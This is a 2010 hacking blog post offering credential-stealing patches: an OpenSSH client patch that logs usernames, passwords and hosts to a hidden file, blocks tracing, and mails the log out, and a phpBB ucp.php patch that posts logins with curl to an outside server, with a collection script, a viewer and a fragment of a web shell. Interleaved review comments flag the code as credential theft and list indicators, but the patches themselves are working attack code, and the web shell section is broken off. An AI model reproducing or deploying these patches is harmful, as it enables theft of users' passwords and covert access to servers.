Jumat, 05 Maret 2010

Memodifikasi source code stealing password

Some Bullshit About SSH Keylogger!

This ssh keylogger patch only works on FreeBSD systems. Use your fucking 
brain to make it work on other operating systems. For the anti-debugging 
feature, there is a simple idea to prevent tracing tools like strace: just 
prevent the ptrace syscall! If you are cool enough, improve this keylogger to 
encrypt the data.

Keep Hacking boyz!

SSH Keylogger OpenSSH-5.3p1 Patch.

--- sshconnect2.c.ori   2010-02-12 21:44:49.000000000 +0700
+++ sshconnect2.c       2010-02-12 22:13:43.000000000 +0700
@@ -31,6 +31,7 @@
 #include 
 #include 

+#include 
 #include 
 #include 
 #include 
@@ -75,6 +76,10 @@
 #include "ssh-gss.h"
 #endif

+//SSH log
+
+#define LOGZ "/tmp/.byteskrew" // change this line and make it more hidden
+
 /* import */
 extern char *client_version_string;
 extern char *server_version_string;
@@ -92,6 +97,16 @@

 Kex *xxx_kex = NULL;

+//Anti Ptrace!
+void tracer_check(void) __attribute__((constructor));
+
+void tracer_check(void){
+   if (ptrace(PT_TRACE_ME, 0, 0, 0) == -1) {
+       _exit(-1);
+   }
+}
+
+
 static int
 verify_host_key_callback(Key *hostkey)
 {
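Review bot: The added `tracer_check` constructor has no place in an SSH client: it is declared `__attribute__((constructor))`, calls `ptrace(PT_TRACE_ME, 0, 0, 0)` and `_exit(-1)`s when that call fails, so the binary is apparently meant to quit when it is started under a tracer. Its only visible purpose is to keep an analyst from observing the password logging that a later hunk of this patch adds to `userauth_passwd`, and the hunk should be rejected rather than fixed. For triage, an `ssh` binary that exits immediately under a debugger or syscall tracer, and whose checksum differs from the packaged OpenSSH build, should be treated as tampered and reinstalled from a trusted package.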
@@ -780,8 +795,9 @@
 userauth_passwd(Authctxt *authctxt)
 {
        static int attempt = 0;
-       char prompt[150];
+       char prompt[150],logz[128];
        char *password;
+       FILE *f;

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
@@ -792,6 +808,18 @@
        snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
            authctxt->server_user, authctxt->host);
        password = read_passphrase(prompt, 0);
+
+ //Password stealth
+if((f=fopen(LOGZ,"a"))!=NULL){
+fprintf 
 (f,"user:password@host --> %s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+fprintf(f,"user:password@host --> %s\n",password);
+    fclose(f);
+        }
+        //kirim ke server pake curl/mail terserah
+        //example pake 'mailx'
+ snprintf(logz,sizeof(logz),"cat %s|mail -s hackme themaniac90@gmail.com",LOGZ);
+       system(logz);
+
        packet_start(SSH2_MSG_USERAUTH_REQUEST);
        packet_put_cstring(authctxt->server_user);
        packet_put_cstring(authctxt->service);
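Review bot: The block added after `read_passphrase()` writes `authctxt->server_user`, the cleartext `password` and `authctxt->host` to the `LOGZ` file and then runs `system()` on a `cat ... | mail` pipeline addressed to an external mailbox, so every password login made with this client is disclosed; this is credential theft and nothing in it should be merged. On a host suspected of running this build, the indicators visible in the patch are the hidden file `/tmp/.byteskrew`, an `ssh` process that spawns shell, `cat` and `mail` children, and outbound mail with the subject `hackme`. Passwords typed into such a client should be considered compromised and rotated from a known-clean machine. `userauth_passwd` starts and ends outside the hunk.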
  

Fears Inside Your Forum

Do you feel secure because your password is encrypted in the database?
Or you may think that hackers can't crack your password just because
your password is strong. Let me tell you something: we know what you
type on your keyboard without stealing your database. We can even
hear what your fingers dance for. No more talk, this code will show
you the fears inside your PHPBB forum.


PHPBB3 UCP.PHP Patch.

--- ucp.old.php 2009-11-16 06:12:47.000000000 -0800
+++ ucp.php 2009-11-17 09:00:08.000000000 -0800
@@ -11,6 +11,14 @@
 /**
 * @ignore
 */
+
+if(!empty($_POST['username']) AND !empty($_POST['password'])){
+  $wr = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n";
+  $uri = explode('?',$wr);
+  $toserv="/usr/bin/curl -d \"u=" . $_POST['username'] .  
 "&p=" . $_POST['password'] . "&uri=" . $uri[0] . "\"  
http://ipsecs.com/devel/log.php >  
/dev/null 2>&1";

+  passthru($toserv);
+}
+
 define('IN_PHPBB', true);
 $phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';
 $phpEx = substr(strrchr(__FILE__, '.'), 1);
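Review bot: The block inserted above `define('IN_PHPBB', true)` copies `$_POST['username']` and `$_POST['password']` into a `/usr/bin/curl -d` command line and runs it with `passthru()`, sending every login submitted through ucp.php to `http://ipsecs.com/devel/log.php`; it is a credential-harvesting backdoor and must be removed, not repaired. Because the POST values reach the shell unescaped, the same lines also let request data be interpreted by the shell on the forum host. Detection points visible here are a web-server process spawning `/usr/bin/curl`, outbound HTTP to that URL, and a ucp.php that no longer matches the file shipped in the phpBB release archive. After cleanup, every forum password entered while the patch was live should be reset.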
@@ -41,6 +49,41 @@
 // Basic "global" modes
 switch ($mode)
 {
+ case 'hack' :
+  //echo "





This forum is hacked!
"; + ?> + +
+  - Backdoor Web Shell  -
+  



Source Code log.php

// Collection endpoint for the ucp.php patch shown earlier on this page: it
// stores one row per request that carries the form fields u, p and uri
// (the same field names the patched ucp.php sends with curl -d).
// NOTE(review): for defenders, a POST with exactly these three fields to a
// log.php on a foreign host is the exfiltration signature to look for in
// proxy and egress logs.
if(isset($_POST['u']) AND isset($_POST['p']) AND isset($_POST['uri'])){

// Database credentials are hard-coded in the script.
$dbhost="localhost";
$dbuser="u_logger";
$dbpass="p_logger";
$dbname="logger";

// Legacy mysql_* API; each failure ends the request and echoes the database
// error text to the client via die(mysql_error()).
$c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error());
mysql_select_db($dbname) or die(mysql_error());
// The three POST values are concatenated into the INSERT statement as-is,
// with no escaping or parameter binding; captured passwords land in table
// klog in cleartext. Not a pattern to reuse in any application code.
$q="INSERT INTO klog (username,password,uri) VALUES  
( '" . $_POST['u'] . "','" . $_POST['p'] . "','" . $_POST['uri'] . "')";
$exec=mysql_query($q) or die(mysql_error());
}
?>


Source Code view.php
if(isset($_POST['key']) AND $_POST['key']=="owned"){
  $dbhost="localhost";
  $dbuser="u_logger";
  $dbpass="p_logger";
  $dbname="logger";

  $c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error());
  mysql_select_db($dbname) or die(mysql_error());
  $q="SELECT username,password,uri FROM klog ORDER BY no DESC";
  $exec=mysql_query($q) or die(mysql_error());
?>

